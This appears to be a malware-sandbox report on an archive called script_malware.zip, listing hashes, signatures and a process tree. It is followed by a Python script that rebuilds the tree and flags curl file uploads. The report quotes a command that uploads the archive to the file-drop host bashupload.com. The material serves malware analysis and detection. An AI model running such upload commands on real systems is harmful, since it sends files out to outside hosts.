Analysis
  max time kernel: 593s
  max time network: 603s
  platform: windows10-2004_x64
  resource: win10v2004-20240226-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 15-03-2024 16:07
Static task
  static1
Behavioral task
  behavioral1
    Sample: script_malware.zip
    Resource: win7-20240221-en (windows7-x64)
    0 signatures, 1800 seconds
Behavioral task
  behavioral2
    Sample: script_malware.zip
    Resource: win10v2004-20240226-en (windows10-2004-x64)
    3 signatures, 1800 seconds
General
  Target: script_malware.zip
  Size: 4.4MB
  MD5: cabc07f288cc71b7447d6098ce3bb245
  SHA1: 2ff090c33470e3c8c2c10888ba0de5539c5126d1
  SHA256: 78276bd481a04c29109fbbd8313701e5b814165fa4b48515ec4489ccfda93107
  SHA512: 7aef8936dd1f734d20a9ab251ab46c22bcaa4c2a012387b7e9fce48e9d870926981c22cf3fac87c2b3bd0ae6f6efe084aaefd15fe229cd1bf085a55e0322dd80
  SSDEEP: 98304:OUCcwlITgiAybrbTWITgJbyvVqUCcwlITgiAybrbTWITgJbyvVvM:pCcCEgiAsTHsyPCcCEgiAsTHsyhM
  Score: 1/10
Malware Config
Signatures
  Suspicious use of AdjustPrivilegeToken (4 IoCs)
    description                 pid   Process
    Token: SeRestorePrivilege   4468  7zG.exe
    Token: 35                   4468  7zG.exe
    Token: SeSecurityPrivilege  4468  7zG.exe
    Token: SeSecurityPrivilege  4468  7zG.exe
  Suspicious use of FindShellTrayWindow (1 IoC)
    pid   Process
    4468  7zG.exe
  Suspicious use of WriteProcessMemory (6 IoCs)
    description                        pid   Process  procid_target
    PID 1672 wrote to memory of 4968   1672  cmd.exe  130
    PID 1672 wrote to memory of 4968   1672  cmd.exe  130
    PID 1672 wrote to memory of 4608   1672  cmd.exe  131
    PID 1672 wrote to memory of 4608   1672  cmd.exe  131
    PID 1672 wrote to memory of 2760   1672  cmd.exe  132
    PID 1672 wrote to memory of 2760   1672  cmd.exe  132
Processes (children are indented under their parent)
  [PID 32] C:\Windows\Explorer.exe
    cmdline: C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\script_malware.zip
  [PID 4484] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4248 --field-trial-handle=2656,i,16940681401824032220,151921362336696246,262144 --variations-seed-version /prefetch:8
  [PID 440] C:\Windows\System32\rundll32.exe
    cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  [PID 4468] C:\Program Files\7-Zip\7zG.exe
    cmdline: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\script_malware\" -spe -an -ai#7zMap30023:108:7zEvent32634
    signatures: Suspicious use of AdjustPrivilegeToken; Suspicious use of FindShellTrayWindow
  [PID 1672] C:\Windows\system32\cmd.exe
    cmdline: "C:\Windows\system32\cmd.exe"
    signatures: Suspicious use of WriteProcessMemory
      [PID 4968] C:\Windows\system32\curl.exe
        cmdline: curl
      [PID 4608] C:\Windows\system32\curl.exe
        cmdline: curl bashupload.com -T script_malware.zip
      [PID 2760] C:\Windows\system32\curl.exe
        cmdline: curl bashupload.com -T script_malware.zip
  [PID 1096] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4212 --field-trial-handle=2656,i,16940681401824032220,151921362336696246,262144 --variations-seed-version /prefetch:8
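The only network-relevant behaviour in this report is cmd.exe (PID 1672) spawning three curl.exe children, two of which push the submitted archive itself to bashupload.com with `-T` (curl's upload-file option); the six WriteProcessMemory IoCs record the same cmd.exe to curl.exe relationships, one edge per child, each listed twice. The report does not show what launched cmd.exe (it sits at the top level of the tree), so nothing here ties the upload to the sample's own code. The script below is an added example, not part of the sandbox report or its vendor's tooling: it rebuilds a parent/child tree from the WriteProcessMemory rows, then walks it to flag curl uploads and print the ancestry chain of each. The input records are transcribed from the report above (labelled constructed); the field names, the `Proc` class and the `find_uploads` logic are this example's own.

```python
"""Rebuild a process tree from sandbox-report events and flag curl file uploads.

Added example, not part of the sandbox report. PROCESSES and WPM_EVENTS are
constructed by transcribing the report's "Processes" section and its
"Suspicious use of WriteProcessMemory" IoC table; all other names are assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed input: (pid, image path, command line) from the report's process list.
PROCESSES = [
    (32, r"C:\Windows\Explorer.exe",
     r"C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\script_malware.zip"),
    (440, r"C:\Windows\System32\rundll32.exe",
     r"C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll "
     r"{9aa46009-3ce0-458a-a354-715610a075e6} -Embedding"),
    (4468, r"C:\Program Files\7-Zip\7zG.exe",
     r'"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\script_malware\" '
     r"-spe -an -ai#7zMap30023:108:7zEvent32634"),
    (1672, r"C:\Windows\system32\cmd.exe", r'"C:\Windows\system32\cmd.exe"'),
    (4968, r"C:\Windows\system32\curl.exe", "curl"),
    (4608, r"C:\Windows\system32\curl.exe", "curl bashupload.com -T script_malware.zip"),
    (2760, r"C:\Windows\system32\curl.exe", "curl bashupload.com -T script_malware.zip"),
]

# Constructed input: the "description" column of the WriteProcessMemory IoCs (each row appears twice).
WPM_EVENTS = [
    "PID 1672 wrote to memory of 4968", "PID 1672 wrote to memory of 4968",
    "PID 1672 wrote to memory of 4608", "PID 1672 wrote to memory of 4608",
    "PID 1672 wrote to memory of 2760", "PID 1672 wrote to memory of 2760",
]

WPM_RE = re.compile(r"PID (\d+) wrote to memory of (\d+)")


@dataclass
class Proc:
    pid: int
    image: str
    cmdline: str
    parent: Optional[int] = None
    children: list = field(default_factory=list)

    @property
    def name(self) -> str:
        return self.image.rsplit("\\", 1)[-1]


def build_tree(processes=PROCESSES, events=WPM_EVENTS) -> dict:
    """Treat 'writer wrote to memory of target' as a parent -> child edge (deduplicated)."""
    procs = {pid: Proc(pid, image, cmd) for pid, image, cmd in processes}
    seen = set()
    for line in events:
        m = WPM_RE.search(line)
        if not m:
            continue  # row not in the expected shape; ignore rather than guess
        writer, target = int(m.group(1)), int(m.group(2))
        if (writer, target) in seen or writer not in procs or target not in procs:
            continue
        seen.add((writer, target))
        procs[target].parent = writer
        procs[writer].children.append(target)
    return procs


def split_args(cmdline: str) -> list:
    """Minimal Windows-style tokenizer: double-quoted runs stay together, quotes dropped."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def find_uploads(procs: dict) -> list:
    """Flag curl.exe invocations carrying -T / --upload-file, with their ancestry chain."""
    hits = []
    for p in procs.values():
        if p.name.lower() != "curl.exe":
            continue
        args = split_args(p.cmdline)[1:]  # drop argv[0]
        upload, host, i = None, None, 0
        while i < len(args):
            a = args[i]
            if a in ("-T", "--upload-file") and i + 1 < len(args):
                upload, i = args[i + 1], i + 2
                continue
            if a.startswith("--upload-file="):
                upload = a.split("=", 1)[1]
            elif not a.startswith("-") and host is None:
                host = re.sub(r"^[a-z]+://", "", a).split("/")[0]  # bare host or URL
            i += 1
        if upload is None:
            continue
        chain, cur = [], p
        while cur is not None:  # walk up to the root of the reconstructed tree
            chain.append(cur.name)
            cur = procs.get(cur.parent) if cur.parent is not None else None
        hits.append({"pid": p.pid, "host": host, "file": upload, "chain": chain[::-1]})
    return hits


if __name__ == "__main__":
    tree = build_tree()
    for h in find_uploads(tree):
        print(f"PID {h['pid']}: {' -> '.join(h['chain'])} uploads {h['file']} to {h['host']}")
```

The tree only has edges for processes that appear in a WriteProcessMemory row, so Explorer.exe, rundll32.exe and 7zG.exe stay as roots with no parent, exactly as the report draws them; a fuller reconstruction would also consume process-creation events, which this report does not list. Against a real feed, extend `PROCESSES`/`WPM_EVENTS` with the parsed rows and treat any `curl.exe`, `certutil.exe`-style upload from a user temp directory to a paste or file-drop host as worth an alert regardless of the sandbox score.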